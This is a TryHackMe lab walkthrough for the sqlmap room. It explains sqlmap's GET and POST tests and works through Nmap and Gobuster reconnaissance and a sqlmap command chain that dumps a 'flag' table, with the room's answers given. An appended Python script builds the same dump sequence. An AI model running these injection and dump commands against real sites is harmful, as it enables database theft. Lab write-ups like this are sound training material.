SQLMap — TryHackMe Walkthrough

Sakib Hassan Prangon
Nov 21, 2023


What is sqlmap?

  • Sqlmap is an open-source penetration testing tool.
  • It automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
  • It offers a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Requests come in two types depending on the HTTP method: GET and POST.

1. Simple HTTP GET Based Test

sqlmap -u https://testsite.com/page.php?id=7 --dbs

Here we have used two flags: -u to state the vulnerable URL and --dbs to enumerate the databases.

2. Simple HTTP POST Based Test

sqlmap -r req.txt -p blood_group --dbs

sqlmap -r <request_file> -p <vulnerable_parameter> --dbs

Note : here req.txt is the request file saved from the intercepting proxy after capturing the request; in this case it was captured with Burp Suite.

SQLMap Challenge

  • I started by running the default Nmap scan.
  • Port 80 is open, serving a default HTTP web page.
  • In the next step I ran Gobuster to find any listed directories and found the /blood directory. I increased the thread count (-t80) for faster searching.

Question 1 : What is the name of the interesting directory?

Answer : blood

  • Then I went to the web page at http://machine_ip/blood
  • I entered some dummy input, intercepted the request in Burp Suite and saved it to a file named request.txt for later use with sqlmap.
  • Then I issued the following command to find the current user:
sqlmap -r request.txt --current-user

Question 2 : Who is the current db user?

Answer : root

  • Then I looked for the databases using the following command (note the double dash on --dbs):
sqlmap -r request.txt --dbs
  • Next I selected the blood database and tried to find its tables using the following command:
sqlmap -r request.txt -D blood --tables
  • Now I can check each table. I selected the second table, named flag, as the one of interest and checked its available columns with the following command:
sqlmap -r request.txt -D blood -T flag --columns
  • Then I dumped all the information in this particular table, "flag", using the following command:
sqlmap -r request.txt -D blood -T flag --dump

Question 3 : What is the final flag?

Answer : thm{sqlm@p_is_L0ve}
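To show what the request file behind -r actually contains and which parameters -p can point at, here is an added Python example (written for this page, not part of the walkthrough or of sqlmap itself) that parses a constructed Burp-style request and lists the enumeration commands used above; the host, path and blood_group parameter are assumptions.

```python
"""Added example (not from the walkthrough): parse a raw HTTP request file as
Burp Suite saves it and `sqlmap -r` reads it, and list the injectable parameters."""
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request (host, path and blood_group are assumptions
# based on the room's /blood form): request line, headers, blank line, body.
REQUEST_TXT = (
    "POST /blood HTTP/1.1\r\n"
    "Host: machine_ip\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: PHPSESSID=constructed\r\n"
    "\r\n"
    "blood_group=A%2B&submit=Search"
)

def parse_request(raw: str) -> dict:
    """Method, path and candidate parameters grouped by injection surface."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = {"GET": dict(parse_qsl(url.query)), "POST": {}}
    # The body is only parameter data when the request is form-encoded.
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params["POST"] = dict(parse_qsl(body))
    # Cookie values are a separate surface; sqlmap tests them only at higher --level.
    cookie = headers.get("cookie", "")
    params["Cookie"] = dict(c.strip().split("=", 1) for c in cookie.split(";") if "=" in c)
    return {"method": method, "path": url.path, "params": params}

def sqlmap_chain(request_file: str, param: str, db: str, table: str) -> list:
    """The walkthrough's enumeration sequence as argv lists (--batch = unattended)."""
    base = ["sqlmap", "-r", request_file, "-p", param, "--batch"]
    return [
        base + ["--current-user"],
        base + ["--dbs"],
        base + ["-D", db, "--tables"],
        base + ["-D", db, "-T", table, "--columns"],
        base + ["-D", db, "-T", table, "--dump"],
    ]

if __name__ == "__main__":
    req = parse_request(REQUEST_TXT)
    print(req["method"], req["path"], req["params"])
    for argv in sqlmap_chain("request.txt", "blood_group", "blood", "flag"):
        print(" ".join(argv))
```

Save the real intercepted request with CRLF line endings intact; a body pasted without the blank line after the headers is the usual reason sqlmap reports no testable parameters.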
